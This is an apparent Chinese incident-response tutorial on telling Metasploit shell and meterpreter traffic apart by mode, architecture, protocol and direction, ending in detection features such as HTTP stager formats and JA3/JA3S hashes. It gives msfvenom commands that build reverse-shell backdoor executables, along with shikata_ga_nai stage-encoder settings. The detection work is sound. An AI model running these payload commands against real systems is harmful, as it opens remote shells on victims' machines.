应急响应-MSF流量分析&模式模块&特征提取_msf流量特征

知识点

战后-流量分析-MSF

特征影响几点

1、变动模式-shell meterpreter
2、变动位数-x64 x32
3、变动协议-tcp http https 
4、变量连接-正向 反向（bind reverse）
1
2
3
4

规则文件

强特征：规则中就直接验证就可以判断
弱特征：需要结合多个弱特征同时满足判断
1
2

一、演示案例-流量分析-MSF-模式模块&HTTP/S-基础特征&源码特征

1、shell模式 明文传输

msfvenom -p windows/x64/shell/reverse_tcp lhost=xx lport=6666 -f exe -o 6666.exe
1

特征：从数据包明文中判断命令执行

2、meterpreter模式 tcp 加密传输

msfvenom -p windows/meterpreter/reverse_tcp lhost=xx lport=6667 -f exe -o 6667.exe
msfvenom -p windows/meterpreter/reverse_tcp lhost=xx lport=6667 -f exe -o 6668.exe
1
2

生成两个后门进行共同点对比，但是这种非常麻烦，因为x32、x64、正反向木马的数据包都不一样，需要一直测试比对。

3、meterpreter模式 HTTP

msfvenom -p windows/meterpreter/reverse_http lhost=xx lport=6667 -f exe -o 6667.exe
msfvenom -p windows/meterpreter/reverse_http lhost=xx lport=6668 -f exe -o 6668.exe
1
2

特征：固定的数据包请求和返回模版（格式一致）

request和response返回的数据包格式一致

判断数据包的请求是不是固定的几个东西

GET /xxx(不固定) HTTP/1.1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 12.2; rv:97.0) Gecko/20100101 Firefox/97.0（固定的是Mozilla/5.0 (）
Host: 47.94.236.117:6670
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
Content-Type: application/octet-stream
Connection: Keep-Alive
Server: Apache
Content-Length: 176220（不固定）
1
2
3
4
5
6
7
8
9
10

shikata_ga_nai编码

MZ标头和DOS模式异常变异
set enablestageencoding true
set stageencoder x86/shikata_ga_nai
1
2
3

4、meterpreter模式 HTTPS

msfvenom -p windows/meterpreter_reverse_https lhost=xx lport=6669 -f exe -o 6669.exe
msfvenom -p windows/meterpreter_reverse_https lhost=xx lport=6669 -f exe -o 6670.exe
1
2

特征：JA3/JA3S值

4d93395b1c1b9ad28122fb4d09f28c5e 652358a663590cfc624787f06b82d9ae
15af977ce25de452b96affa2addb1036 2253c82f03b621c5144709b393fde2c9
1
2